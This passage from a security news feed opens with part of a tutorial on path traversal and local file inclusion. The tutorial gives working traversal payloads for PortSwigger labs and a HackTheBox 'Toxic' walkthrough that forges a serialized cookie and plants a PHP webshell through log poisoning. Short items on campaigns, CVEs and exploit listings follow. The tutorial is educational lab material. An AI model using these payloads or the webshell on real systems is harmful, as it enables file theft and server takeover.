management tools prove they are better. Check out more on github for tools like rengine, osmedeus, reconftw. Alternatively you can read about these automated frameworks for recon and how they are effective in this blog Option 2: Using ZAP Proxy This is highly under-rated tool, this tool has an feature called spider and ajax spider, powerful spidering GUI tool, that is accessible with just one right click on the target ! See the below image all you need to do is click on manual explore > pick your domain.com > right click it > select ajax spider or spider and you would have an GUI application that discovers endpoints in web application for you in real time…. Another under-rated feature is active scan. This feature scans for basic attacks, and fortunately for us, single scan solved our lab. In the bottom left corner, we see alerts and it shows all the findings, we also notice an alert for path traversal. So if you are not using zap make sure from your next pentest or CTF engagement you use it for finding low hanging fruits, and to discover hidden endpoints. Option 3: Arjun This is another popular parameter discovery toolkit which you can download from github. This can be easily installed with pipx, you can google how to install pip and python in your operating system and once done, you can run this tool. Unfortunately we could not find any parameters, that’s fair sometimes things work as expected and other times it does not. Option 4 : Param-miner extension from burp suite You can download from burpsuite extensions sectionand make sure you have enabled this extension. Although, we could not find endpoint using this extension, but having a peak at logger in burpsuite revealed an interesting query. Now this proves the importance for most over-looked section in burpsuite, and it taught us valuable lesson on not to overlook logger section from burpsuite. Option 5 : Your favourite param-discovery toolkits You might be considering tools like GAU (get all urls), or waybackurls. While these are valid, in CTFs and sometimes in real world, these tools did not give me much helpful results that the first option (automated frameworks) gave me. So feel free to test all the options before you come to this conclusion, but for me the first fours options have stood and were useful for me from time to time. Black box testing For this approach, you can find the valid parameter, and fuzz with wordlists online (spray and pray method), but in long run it’s the least effective ones. When you encounter windows based servers you can use payloads like the following, instead for forward slash, use backward slash. https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini Now, since we have understood how to find parameters, now all the sauce is in using and modifying payloads. For this reason we will be quickly going through labs. Lab 1: File path traversal, traversal sequences blocked with absolute path bypass **Lab URL: ** https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass The server in our case, doesn’t validate whether the requested path is relative or absolute. By providing an absolute path like /etc/passwd, the server directly accesses the file from the root directory, bypassing any intended restrictions to a specific folder (e.g., /var/www/images). This works because the server naively trusts the user-supplied path without normalization, or maybe because the server it’self is hosted in /root directory? We can only make close assumptions as we don’t have source code or any idea on how server is configured, but non the less, using an absolute path is one of the valid bypasses when trying for file inclusion attacks ! Payload : image?filename=/etc/passwd URL to solve this lab: https://0abd00f003c4b8d780a68f89005800a7.web-security-academy.net/image?filename=/etc/passwd Lab 2 : File path traversal, traversal sequences stripped non-recursively Lab URL : https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively Sometimes, ../ does not get processed by the server. You can try ....// or ..../\ to bypass the restriction to retrieve files from the server. Payload: ....//....//....//etc/passwd URL to solve this lab: https://0a4f0056045333198529bcfd00140019.web-security-academy.net/image?filename=....//....//....//etc/passwd Lab 3: File path traversal, traversal sequences stripped with superfluous URL-decode Lab URL : https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode Sometimes characters like / don’t get accepted by the webservers, and a simple urlencode either done inside burpsuite or done with cyberchef, would bypass this restriction. Feel free to combine techniques learnt from lab 1 & 2 and perform URL encoding on these payloads. Payload: ..%252f..%252f..%252fetc/passwd URL to solve this lab : https://0a52002e03482067812362170031003e.web-security-academy.net/image?filename= Lab 4: File path traversal, validation of start of path Lab URL : https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path Sometimes including the base path in the payload (e.g,/var/www/images/../../../../etc/passwd) tricks the server into appending it, then traversing upward to escape the restricted directory and access sensitive files. Just like how we store websites html code in /var/www/html we can store images in /var/www/images. Also when we manually explore the image location by right-clicking and viewing the image, we get this URL https://0a5700af03e6c4bd8173ed7e009900cb.web-security-academy.net/image?filename=/var/www/images/21.jpg and this suggests we should append an valid start path for payload to work. Payload: /var/www/images/../../../etc/passwd URL to solve this lab: https://0a5700af03e6c4bd8173ed7e009900cb.web-security-academy.net/image?filename=/var/www/images/../../../etc/passwd Lab 5 : File path traversal, validation of file extension with null byte bypass Lab URL : https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass The server might be configured to check and accept only a valid file extension (e.g., .png). Adding a null byte (%00) after the target file (e.g., ../../../etc/passwd%00.png) truncates the string, removing the enforced extension. This allows traversal while satisfying the extension check superficially. Payload: ../../../etc/passwd%00.png Whitebox Testing Lab URL : https://app.hackthebox.com/challenges/Toxic Pentesting LFI White Box Series: How a Tiny Cookie Crashed the Party (Understanding the Toxic Challenge’s Vulnerability) Source Code analysis The Toxic challenge has two critical flaws: Blind Trust in Cookies: The website uses a cookie (PHPSESSID) to decide what to show you. But it doesn’t check if the cookie is safe—it just follows orders. Dangerous File Inclusion: When the website opens files, it doesn’t verify if you’re allowed to see them. Like leaving your house keys under the doormat. Where’s the vulnerability hiding? File: index.php (main page code) and PageModel.php (a helper script). Let’s translate the code into plain English: The Autoloader (index.php) spl_autoload_register(function ($name) { if (preg_match(''/Models/'', $name)) { $name = ""models/${name}""; } include_once ""${name}.php""; }); When the website needs a tool (like a class), it checks a toolbox folder (models/) to grab it. The Problem is that it doesn’t lock the toolbox. Hackers can trick it into doing something it was not intended to do. The Cookie Setup if (empty($_COOKIE[''PHPSESSID''])) { $page = new PageModel; $page->file = ''/www/index.html''; setcookie(''PHPSESSID'', base64_encode(serialize($page)), ...); } The website gives you a lunchbox (cookie) with a sandwich (index.html). Now the problemis that you can replace the cookie with anything, including a malicious payload. The PageModel Class (PageModel.php) class PageModel { public $file; public function __destruct() { include($this->file); } } This part of code is designed to automatically opens whatever file is stored in $file. The Problem is that If $file is set to something dangerous (like /var/log/secret.log), the website will still open it allowing hackers to exploit local file inclusion vulnerability. Our main goal is to turn a boring cookie into a remote command center. Step 1: Create a Poisoned cookie Tamper with the Cookie: The cookie is a base64-encoded serialized PageModel object. So let’s decode the cookie. ┌─[mccleod1290@parrot]─[~/Desktop] └──╼ $echo ""Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9"" | base64 -d O:9:""PageModel"":1:{s:4:""file"";s:15:""/www/index.html"";} Change the file property from /www/index.html to /var/log/nginx/access.log (the website’s diary). ┌─[dwbruijn@parrot]─[~/Desktop] └──╼ $echo ''O:9:""PageModel"":1:{s:4:""file"";s:25:""/var/log/nginx/access.log"";}'' | base64 Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo= Step 2: Write a Secret Message in the Diary Poison the Logs: Send a request to the website with a malicious User-Agent: <?php system($_GET[''cmd'']); ?> This writes your PHP code into the log file (like scribbling instructions in the diary). Step 3: Combine both step 1 & 2 Trigger the Exploit: - Reload the page. The website reads the poisoned log file and executes your code. Your `http request should look something like the following: Now to get flag you could do the following list of actions: Add ?cmd=ls+/ to the URL to list files. Use ?cmd=cat+/flag.txt to steal the flag! Conclusion File inclusion vulnerabilities—whether Local (LFI) or Remote (RFI)—are a stark reminder of the dangers of misplaced trust. LFI attacks an application’s own habitat, by path traversal vulnerabilities to access of important files or elevated privileges. Rather, RFI converts the application into a puppets, running malicious code moved from external domains. Both, nonetheless, have one thing in common: blind faith in poorly sanitized user input. The fallout is severe. A parameter unvalidated can lead to Data leaks, credentials theft, complete system takeover. Attackers move from reading /etc/passwd to their respective home directories to flash webshells, poisoning logs or total takeover of underlying infrastructures. Mitigation isn’t optional—it’s existential: Strictly enforce allowlists: Only allow access to specific files, directories or URLs. If it’s not on the list, then it does not exist. Disable or kill dynamic inclusion: If your app does not need to include files based on user input, then turn on the feature off. Period. Normalize and sanitize: back to absolute form for paths, remove traversal sequences (../), and ban on evil chars (e. g. %00, ://) Sandbox file operations: Execute inclusion operations as a limited user in order to keep them away from vital system resources. Defenses in layers : Mix input validation with Web Application Firewalls (WAF), Runtime monitoring of anomalies. Understanding LFI and RFI is not transactional, it’s transformative, it’s not patching code, it’s renewing trust. Each inclusion point is an entry point for attackers. Hardening these vectors are you not just fixing a bug you are taking out an entire class of exploits. Complacency is the enemy in cybersecurity, stay curious, and stay hungry, see you on the next blog.

by HACKLIDO

A new multi-stage attack has been observed delivering malware families like Agent Tesla variants, Remcos RAT, and XLoader. ""Attackers increasingly rely on such complex delivery mechanisms to evade detection, bypass traditional sandboxes, and ensure successful payload delivery and execution,"" Palo Alto Networks Unit 42 researcher Saqib Khanzada said in a technical write-up of the campaign. The

by The Hacker News

The notorious nation-state-backed threat actor has added two new keyloggers, a lateral movement tool, and an endpoint detection and response (EDR) evasion driver to its arsenal.

by Dark Reading

Until Google rolls out a fix, you''ll have to be on the lookout for this particularly convincing phishing scam.

by ZDNET Security

In late 2024, Darktrace detected unusual activity linked to Cyberhaven''s Chrome browser extension. Read more about Darktrace’s investigation here.

by Darktrace

Account takeovers are rising with SaaS adoption. Learn how Darktrace detects deviations in user behavior and autonomously stops threats before they escalate.

by Darktrace

An email bomb attack floods inboxes with a large volume of emails to disrupt operations and conceal suspicious activity, often bypassing traditional security tools. Darktrace detected such an attack in early 2025, identifying unusual email patterns and subsequent network anomalies.

by Darktrace

An alleged operator of the SmokeLoader malware is now facing federal hacking charges in Vermont after accusations that he stole personal information on more than 65,000 people.

by The Record

Explore Darktrace''s Annual Threat Report 2024 for insights on the latest cyber threats and trends observed throughout the year.

by Darktrace

With unapproved AI tools entrenched in daily workflows, experts say it’s time to shift from monitoring to managing Shadow AI use across the enterprise. The post The Shadow AI Surge: Study Finds 50% of Workers Use Unapproved AI Tools appeared first on SecurityWeek.

by SecurityWeek

The Pravda Dashboard reveals how Russia''s global network circumvents sanctions on prohibited content The post Russia’s Pravda network in numbers: Introducing the Pravda Dashboard appeared first on DFRLab.

by DFRLab

Text scams come in many forms and are an ever increasing threat doing an awful lot of financial, and other, damage

by Malwarebytes Labs

Reddit disclosed that the United States remained the largest source of legal demands for account information in the second half of 2024, accounting for nearly two-thirds of all global government and law enforcement requests. The company revealed these details in its latest transparency report, highlighting a notable increase in both the volume and rate of … The post Reddit Says U.S. Top Requester of User Account Data appeared first on CyberInsider.

by Cyber Insider

The agency is recommending that organizations and individuals implement its recommendations to prevent the misuse of stolen data, though Oracle has yet to publicly do the same for its customers.

by Dark Reading

Your employees didn’t mean to expose sensitive data. They just wanted to move faster. So they used ChatGPT to summarize a deal. Uploaded a spreadsheet to an AI-enhanced tool. Integrated a chatbot into Salesforce. No big deal—until it is. If this sounds familiar, you''re not alone. Most security teams are already behind in detecting how AI tools are quietly reshaping their SaaS environments. And

by The Hacker News

In a document published Thursday, ICE explained the functions that it expects Palantir to include in a prototype of a new program to give the agency “near real-time” data about people self-deporting.

by WIRED Security News

Cybercriminals have various methods at their disposal to hack and exploit credit card information. Learn what they are, how to prevent them and what to do when hacked.

by ComputerWeekly

Around the world, governments are setting higher-bar regulations with clear corporate accountability for breaches on the belief organizations won''t drive up security maturity for operational technology unless they''re made to.

by Dark Reading

Did you know that when participating in a Zoom call, you can grant permission to other participants to control your computer remotely? While this feature may come in handy when dealing with trusted family, friends and colleagues, threat actors have started abusing it to install malware on targets’ computer. The Zoom remote control attack This specific tactic has been leveraged by an individual or group that The Security Alliance (SEAL) – a nonprofit dedicated to … More → The post The Zoom attack you didn’t see coming appeared first on Help Net Security.

by Help Net Security

The Interlock ransomware gang now uses ClickFix attacks that impersonate IT tools to breach corporate networks and deploy file-encrypting malware on devices. [...]

by BleepingComputer

OpenAI has launched three new reasoning models - o3, o4-mini, and o4-mini-high for Plus and Pro subscribers, but as it turns out, these models do not offer ''unlimited'' usage. [...]

by BleepingComputer

The technology giant said two zero-day vulnerabilities were used in attacks on iOS devices against "specific targeted individuals," which suggests spyware or nation-state threat activity.

by Dark Reading

CISA funds near-expired CVE program, attackers leverage Gamma AI to phish Microsoft users, and Mustang Panda deploys new toolkit to target Myanmar. The post The Good, the Bad and the Ugly in Cybersecurity – Week 16 appeared first on SentinelOne.

by SentinelOne

Cybersecurity researchers are warning of continued risks posed by a distributed denial-of-service (DDoS) malware known as XorDDoS, with 71.3 percent of the attacks between November 2023 and February 2025 targeting the United States. ""From 2020 to 2023, the XorDDoS trojan has increased significantly in prevalence,"" Cisco Talos researcher Joey Chen said in a Thursday analysis. 

by The Hacker News

The FBI warns that scammers posing as FBI IC3 employees are offering to ""help"" fraud victims recover money lost to other scammers. [...]

by BleepingComputer

ASUS is warning about an authentication bypass vulnerability in routers with AiCloud enabled that could allow remote attackers to perform unauthorized execution of functions on the device. [...]

by BleepingComputer

CVE-2021-20035, an old vulnerability affecting Sonicwall Secure Mobile Access (SMA) 100 series appliances, is being exploited by attackers. Sonicwall confirmed it by updating the original security advisory to reflect the new state of play, and by changing the description of the vulnerability to say that can potentially lead to code execution, instead of only to denial of service (DoS). About CVE-2021-20035) Sonicwall SMA 100 series appliances provide a unified secure access gateway optimized for small … More → The post Sonicwall SMA100 vulnerability exploited by attackers (CVE-2021-20035) appeared first on Help Net Security.

by Help Net Security

Noteworthy stories that might have slipped under the radar: 4chan hacked, auto-reboot security feature coming to Android, Iranian administrator of Nemesis charged in US. The post In Other News: 4chan Hacked, Android Auto-Reboot, Nemesis Admin Charged appeared first on SecurityWeek.

by SecurityWeek

Proof-of-concept code has been released after researchers disclosed a maximum severity remote code execution vulnerability in Erlang/OTP SSH. Successful exploitation could allow for complete takeover of affected devices.BackgroundOn April 16, Fabian Bäumer, Marcus Brinkmann, Marcel Maehren, and Jörg Schwenk of the Ruhr University Bochum in Germany disclosed a critical vulnerability in Erlang/OTP SSH to the OpenWall vulnerability mailing list. Additionally an official advisory was posted to the GitHub project for Erlang/OTP crediting the researchers for their disclosure.CVEDescriptionCVSSv3VPRCVE-2025-32433Erlang/OTP SSH Remote Code Execution Vulnerability10.010*Please note: Tenable’s Vulnerability Priority Rating (VPR) scores are calculated nightly. This blog post was published on April 18 and reflects VPR at that time.AnalysisCVE-2025-32433 is a remote code execution (RCE) vulnerability affecting the Erlang/OTP SSH server. The vulnerability exists due to a flaw in the SSH protocol message handling which could allow an unauthenticated attacker to execute arbitrary code. According to the advisory, all users running Erlang/OTP SSH servers are impacted and to assume impact if your application utilizes the Erlang/OTP SSH library. This vulnerability received the maximum CVSSv3 score of 10.0 and when the SSH daemon is running as root, allows an attacker to completely compromise an affected device.At the time this blog was published, no known exploitation has been observed, however with the ease of exploitation and critical severity, we anticipate attacks will occur soon.Proof of conceptOn April 17, researchers at Platform Security released a public proof-of-concept (PoC) exploit for CVE-2025-32433. The writeup notes that the PoC was generated with the help of ChatGPT and Cursor, and that it was fairly simple to do so using those AI tools.The PoC initiates an SSH protocol negotiation as a normal client would. But, before authenticating the user, the client sends an unexpected message with an arbitrary command. The vulnerable server will process these messages and execute the commands. A patched server will disconnect immediately upon seeing these messages prior to authentication.An additional PoC has been released, and the Horizon3 Attack Team posted on X (formerly Twitter) that they had developed a PoC but have chosen not to release it as of writing.Just finished reproducing CVE-2025-32433 and putting together a quick PoC exploit — surprisingly easy. Wouldn’t be shocked if public PoCs start dropping soon. If you’re tracking this, now’s the time to take action. #Erlang #SSH pic.twitter.com/hBqJMfFHMN— Horizon3 Attack Team (@Horizon3Attack) April 17, 2025SolutionErlang/OTP has released patches to address this vulnerability.Affected VersionsFixed VersionsOTP-27.3.2 and belowOTP-27.3.3OTP-26.2.5.10 and belowOTP-26.2.5.11OTP-25.3.2.19 and belowOTP-25.3.2.20If immediate patching cannot be performed, restricting access via a firewall or disabling the SSH server are mitigation steps provided by Erlang/OTP. However, we strongly recommend upgrading as soon as possible to fully remediate this vulnerability.Identifying affected systemsA list of Tenable plugins for this vulnerability can be found on the individual CVE page for CVE-2025-32433 as they’re released. This link will display all available plugins for this vulnerability, including upcoming plugins in our Plugins Pipeline.Additionally, customers can utilize Tenable Attack Surface Management to identify hosts running Erlang/OTP SSH Server.Get more informationOpenwall mailing list announcement for CVE-2025-32433Advisory for CVE-2025-32433Join Tenable''s Security Response Team on the Tenable Community.Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

by Tenable

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apple products and Microsoft Windows NTLM flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple products and Microsoft Windows NTLM vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions of the flaws: This week Apple released out‑of‑band […]

by Security Affairs

This post first appeared on blog.netwrix.com and was written by Dirk Schrader.What Is CMMC? The Cybersecurity Maturity Model Certification (CMMC) is a framework designed by the US Department of Defense (DoD) to enhance the cybersecurity posture of companies within the Defense Industrial Base (DIB). It establishes security requirements that contractors must meet to protect Controlled Unclassified Information (CUI) and Federal Contract Information (FCI) from cyber threats. … Continued

by Netwrix

The company is notifying about 190,000 people after certain information used for car insurance quotes was left unencrypted.

by Cybersecurity Dive

A remote code execution vulnerability affecting SonicWall Secure Mobile Access (SMA) appliances has been under active exploitation since at least January 2025, according to cybersecurity company Arctic Wolf. [...]

by BleepingComputer

Data protection firm Cy4Data Labs has raised $10 million in a Series A funding round led by Pelion Venture Partners. The post Cy4Data Labs Raises $10 Million to Secure Data in Use appeared first on SecurityWeek.

by SecurityWeek

A critical vulnerability tracked as CVE-2025-2492 has been disclosed in ASUS routers running AiCloud, potentially allowing remote attackers to execute unauthorized functions without authentication. The flaw, rated 9.2 (Critical) under the CVSS 4.0 system, affects multiple firmware versions and underscores the continued risk posed by exposed cloud-enabled features in consumer networking devices. The vulnerability was … The post Critical Authentication Flaw in ASUS AiCloud Exposes Routers to Remote Attacks appeared first on CyberInsider.

by Cyber Insider

Ahead of a key hearing in the U.S. government''s antitrust case against Google, Mozilla CEO Laura Chambers has warned that some proposed remedies could unintentionally damage Firefox and the broader ecosystem of independent browsers. The hearing, scheduled for April 21, 2025, follows the DOJ''s 2020 lawsuit accusing Google of illegally maintaining its monopoly in the … The post Mozilla Fears Firefox Fallout from Google Search Antitrust Case appeared first on CyberInsider.

by Cyber Insider

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a medium-severity security flaw impacting Microsoft Windows to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation in the wild. The vulnerability, assigned the CVE identifier CVE-2025-24054 (CVSS score: 6.5), is a Windows New Technology LAN Manager (NTLM) hash disclosure

by The Hacker News

Microsoft has announced that support for Office 2016 and Office 2019 will officially end on October 14, 2025, prompting organizations to begin planning their migration to Microsoft 365 Apps. The company emphasizes that continuing to use these legacy versions after the deadline could result in missing critical security updates and experiencing connectivity issues with Microsoft … The post Microsoft Sets October 2025 Deadline to Replace Office 2016 and 2019 appeared first on CyberInsider.

by Cyber Insider

A fix for a critical flaw in a tool allowing organizations to run GPU-accelerated containers released last year did not fully mitigate the issue, spurring the need to patch a secondary flaw to protect organizations that rely on NVIDIA processors for AI workloads.

by ITPro Today

Not all cloud-based apps are cloud-native and vice versa. This guide unpacks the architectural, operational, and strategic distinctions to help IT teams make the right deployment choices.

by ITPro Today

Check out NIST’s effort to further mesh its privacy and cyber frameworks. Plus, learn why code-writing GenAI tools can put developers at risk of package-confusion attacks. Also, find out what Tenable webinar attendees said about identity security. And get the latest on the MITRE CVE program and on attacks against edge routers.Dive into five things that are top of mind for the week ending April 18.1 - NIST updates Privacy Framework, tailoring it to the Cybersecurity Framework and adding an AI sectionRecognizing the data protection and cyberattack prevention overlap and are deeply intertwined, the U.S. government is aligning two foundational privacy and cybersecurity frameworks.This week, the U.S. National Institute of Standards and Technology (NIST) released a draft update of its Privacy Framework (PFW) that more closely interconnects it with the popular Cybersecurity Framework (CSF), which was updated in 2024.Although the PFW can be used on its own, this updated version makes its use with the CSF “seamless” so that organizations can leverage the two frameworks “to manage the full spectrum of privacy and cybersecurity risks,” Julie Chua, Director of NIST’s Applied Cybersecurity Division, said in a statement.Both frameworks have a “Core” section, which outlines detailed activities and outcomes aimed at helping organizations discuss risk management. “The PFW 1.1 Public Draft Core is realigned with the CSF 2.0 Core in many places, making life easier on users,” NIST said in the statement.The “NIST Privacy Framework 1.1 Initial Public Draft” also adds a new section about the risks to data privacy from artificial intelligence. Specifically, organizations can use it to “ensure that organizational privacy values are reflected in the development and use of AI systems,” the PFW draft reads.NIST first published the PFW in 2020, with the goal of helping organizations mitigate the privacy risks associated with the processing of personal data in their computer systems. It outlines five core functions:Identify, which includes inventorying the organization’s data-processing scenarios and conducting privacy risk assessmentsGovern, which involves the creation and adoption of the organization’s governance structure for data privacyControl, which addresses the organization’s development and implementation of appropriate data-management activitiesCommunicate, which includes sharing publicly how the organization processes personal data and manages privacy risksProtect, which touches on the organization’s data security processes aimed at preventing cyber breachesThe PFW 1.1 draft is open for public comment until June 13, 2025. NIST plans to publish a final version later this year.For more information about data privacy and data security, check out these Tenable resources:“What Makes This “Data Privacy Day” Different?” (blog)“Know Your Exposure: Is Your Cloud Data Secure in the Age of AI?” (on-demand webinar)“Harden Your Cloud Security Posture by Protecting Your Cloud Data and AI Resources” (blog)“The Data-Factor: Why Integrating DSPM Is Key to Your CNAPP Strategy” (blog)“Data Security in Healthcare: How Tenable Cloud Security Can Help” (blog)2 - GenAI code-generation hallucinations open the door for package-confusion attacks Here’s a warning for developers who use generative AI to write code: Generative AI tools may prompt you to download software packages that are infected with malware.That’s the main finding from the study “We Have a Package for You! A Comprehensive Analysis of Package Hallucinations by Code Generating LLMs” by researchers from the University of Texas at San Antonio, the University of Oklahoma and Virginia Tech.How can this happen? When prompted to write code, generative AI tools powered by large language models (LLMs) often suggest that developers download software packages from public repositories.However, in many cases, the software packages the generative AI tools mention don’t exist. The tools invent names for non-existent software packages and falsely say the packages are located in specific software repositories.Best case scenario is that the developer goes looking for the imagined software package and doesn’t find it. Unfortunately, cyberattackers are taking note. They’re baptizing their malicious packages with the made-up names and storing them in repositories, hoping developers will inadvertently download them thinking they’re legit.  “These hallucinations, which arise from fact-conflicting errors when generating code using LLMs, represent a novel form of package confusion attack that poses a critical threat to the integrity of the software supply chain,” the researchers wrote.The researchers generated 576,000 code samples in Python and JavaScript using 16 generative AI tools and two unique prompt datasets. Here are some key findings:The incidence of package hallucination was an average of 5.2% for commercial tools and 21.7% for open-source tools.The tools generated about 205,000 unique hallucinated package names.“Our experiments and findings highlight package hallucinations as a persistent and systemic phenomenon while using state-of-the-art LLMs for code generation, and a significant challenge which deserves the research community’s urgent attention,” the researchers wrote.The researchers also tested several mitigation techniques that helped reduce the incidence of software-package hallucinations, including retrieval augmented generation; self refinement; and fine tuning.For more information about AI security and the risks of using generative AI for writing code:“Cybersecurity Risks of AIGenerated Code” (Georgetown University)“AI-generated code risks: What CISOs need to know” (ITPro)“The risks of AI-generated code are real — here’s how enterprises can manage the risk” (Venturebeat)“Gen AI could speed up coding, but businesses should still consider risks” (ZDNet)“AI coding agents come with legal risk” (CIO)3 - Tenable polls webinar attendees on identity securityDuring our recent webinar “Three Reasons Why It''s Time to Embrace Identity as Part of Exposure Management,” we polled attendees about identity security topics, such as their ability to correlate identity incidents with broader attack paths. Check out what they said.(119 webinar attendees polled by Tenable, March 2025)(110 webinar attendees polled by Tenable, March 2025)(144 webinar attendees polled by Tenable, March 2025)Check out this on-demand webinar to learn how you can adopt a more proactive identity security strategy as part of your exposure management program. 4 - Canada’s cyber agency warns about spike in router hacking Nation-state attackers associated with China’s government, including the cyber espionage group Salt Typhoon, are ramping up attacks on network edge routers of critical infrastructure organizations.The Canadian Centre for Cyber Security issued the warning this week via an advisory titled “People’s Republic of China activity targeting network edge routers: Observations and mitigation strategies” which details the threat and offers mitigation recommendations.Compromised network edge routers can allow attackers to breach a network and then monitor, modify, and exfiltrate network traffic, and even move deeper into the victim’s network, according to the advisory.A key insight: The attackers are feasting on low-hanging fruit -- misconfigured and unpatched routing devices. The best and simplest prevention? Patch these products as soon as possible. “Threat actors often compromise network perimeter defenses by exploiting known vulnerabilities in edge devices. These security weaknesses are usually already identified, and patches are available to fix them. However, breaches occur because these patches are not consistently applied or implemented in a timely manner,” the advisory reads.The Cyber Centre has also observed router compromises stemming from basic security mistakes, such as the use of default and weak passwords, and of default security settings.Other mitigation recommendations include:Disable unnecessary network edge services, especially unsecured ones such as HTTP.Remove direct internet access to device management interfaces, restricting admins to internal and secure management networks.Protect all administrative access with phishing-resistant multi-factor authentication.Use modern encryption standards.Keep firmware updated.Adopt secure, centralized logging, encrypt logging traffic and store logs offsite.For more information about Salt Typhoon:“Salt Typhoon: An Analysis of Vulnerabilities Exploited by this State-Sponsored Actor” (Tenable)“China’s Salt Typhoon Spies Are Still Hacking Telecoms—Now by Exploiting Cisco Routers” (Wired)“New CISA Hardening Guidance Provides Valuable Insights for Network Security Engineers” (Tenable)“What Should the US Do About Salt Typhoon?” (Dark Reading)“What is Salt Typhoon? A security expert explains the Chinese hackers and their attack on US telecommunications networks” (The Conversation)5 - CVE program renewed for one year, but questions about its future lingerA collective gasp was heard around the cybersecurity world on Tuesday, when news broke that the MITRE Common Vulnerabilities and Exposures (CVE) program might be in imminent danger of shutting down.Fortunately, this scenario didn’t materialize, after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) came to the rescue and extended the program’s funding for one year just as it was set to expire. Naturally, concerns remain about the MITRE CVE program and the critical services it provides, given the close call it experienced and the limited one-year extension it obtained.Speaking to The Wall Street Journal, Tenable Chief Security Officer and Head of Research Bob Huber said efforts to reform the CVE program will likely yield a public-private partnership of some sort. “Most of the companies that operate in this place are well-known amongst each other, as are the people responsible for those programs. I think there’s an opportunity here to improve that partnership and spread the responsibility,” Huber told the Journal.As of the end of 2024, the CVE program had published more than 250,000 CVEs. Launched in 1999, the CVE program provides a foundational, common taxonomy for tracking vulnerabilities and exposures.To get all the details and insights about this issue, check out these two Tenable blogs:“MITRE CVE Program Funding Extended For One Year”“Frequently Asked Questions About the MITRE CVE Program Expiration and Renewal”

by Tenable

The 2023 collapse of major U.S. banks underscores how weak risk management can trigger economic turmoil — and why a data-driven, tech-enabled risk strategy is essential for long-term stability and growth.

by ITPro Today

PKWARE announced its quantum readiness assessment and encryption capabilities to help organizations protect sensitive data from quantum computing threats. Quantum computing is no longer theoretical—it is becoming a powerful reality with the potential to disrupt current encryption standards. As quantum machines become capable of breaking traditional encryption methods like RSA and ECC, organizations must act now to secure their data for the future. PKWARE simplifies what could be a complex transition to post-quantum cryptography with proven … More → The post PKWARE Quantum Readiness Assessment secures data from quantum computing threats appeared first on Help Net Security.

by Help Net Security

Legends International disclosed a data breach from November 2024 that affected employees and visitors to its managed venues. Legends International is a global leader in sports and entertainment venue management, specializing in delivering comprehensive solutions for stadiums, arenas, and attractions. The company offers a 360-degree service platform that includes strategic planning, sales, partnerships, hospitality, merchandise, […]

by Security Affairs

Phone theft is now commonplace in London. The Met Police recently revealed that it seizes 1,000 stolen phones weekly as it cracks down on organized criminal networks driving the £50 million trade. Nationally, cases have doubled to 83,900 annually. The real issue, though, isn’t the losing of a phone – it’s what happens next. Thieves are after the valuable digital assets inside the phone. With the proper access, a stolen phone becomes an all-access pass … More → The post The UK’s phone theft crisis is a wake-up call for digital security appeared first on Help Net Security.

by Help Net Security

KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection

by Exploit DB

UJCMS 9.6.3 - User Enumeration via IDOR

by Exploit DB

Inventio Lite 4 - SQL Injection

by Exploit DB

Langflow 1.3.0 - Remote Code Execution (RCE)

by Exploit DB

Apache Commons Text 1.10.0 - Remote Code Execution

by Exploit DB

Tatsu 3.3.11 - Unauthenticated RCE

by Exploit DB

Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation

by Exploit DB

The recent uncertainty around MITRE''s CVE database highlights a major risk in relying on a single intel source. Learn why diversified, multi-source vulnerability intelligence is crucial for cyber resilience.

by Recorded Future

Following reports of unauthorized access to a legacy Oracle cloud environment, CISA warns of potential credential compromise leading…

by Hackread

A near-miss episode of attempted defunding spotlights a need for a better way

by Sophos News

The China-linked threat actor known as Mustang Panda has been attributed to a cyber attack targeting an unspecified organization in Myanmar with previously unreported tooling, highlighting continued effort by the threat actors to increase the sophistication and effectiveness of their malware. This includes updated versions of a known backdoor called TONESHELL, as well as a new lateral movement

by The Hacker News

Right now, today, thousands of people are being tricked into going to their banks or credit unions to withdraw large sums of cash and will give or send it to a complete stranger, never to see it again. Many of the victims are in the prime of their lives, intelligent, and consider themselves to be of above-average ability in spotting scams and scammers.

by KnowBe4

The threat actors lace pre-downloaded applications with malware to steal cryptocurrency by covertly swapping users'' wallet addresses with their own.

by Dark Reading

China-linked APT group Mustang Panda deployed a new custom backdoor, MQsTTang, in recent attacks targeting Europe, Asia, and Australia. China-linked APT group Mustang Panda (aka Camaro Dragon, RedDelta or Bronze President). deployed a new custom backdoor, tracked as MQsTTang, in recent attacks targeting entities in Europe, Asia, and Australia. Mustang Panda has been active since […]

by Security Affairs

The president revoked the former CISA director''s security clearance, half a decade after Krebs challenged right-wing election disinformation, prompting his eventual resignation.

by Dark Reading

A new report from iVerify has revealed a far-reaching global surveillance threat enabled by China’s state-owned telecom interconnect providers. By exploiting outdated mobile signaling protocols, entities such as China Mobile International (CMI) and China Telecom Global have gained alarming access to sensitive mobile communications worldwide, with implications ranging from mass user profiling to covert malware … The post Global Telecom Networks Host Hidden Chinese Surveillance Nodes appeared first on CyberInsider.

by Cyber Insider

Security researchers report CVE-2025-32433, a CVSS 10.0 RCE vulnerability in Erlang/OTP SSH, allowing unauthenticated code execution on exposed…

by Hackread

The AI security startup has already made waves with critical vulnerability discoveries and seeks to address emerging AI concerns with its PromptArmor platform.

by Dark Reading

In this week’s newsletter, Thorsten muses on how search engines and AI quietly gather your data while trying to influence your buying choices. Explore privacy-friendly alternatives and get the scoop on why it''s important to question the platforms you interact with online.

by Cisco Talos Blog

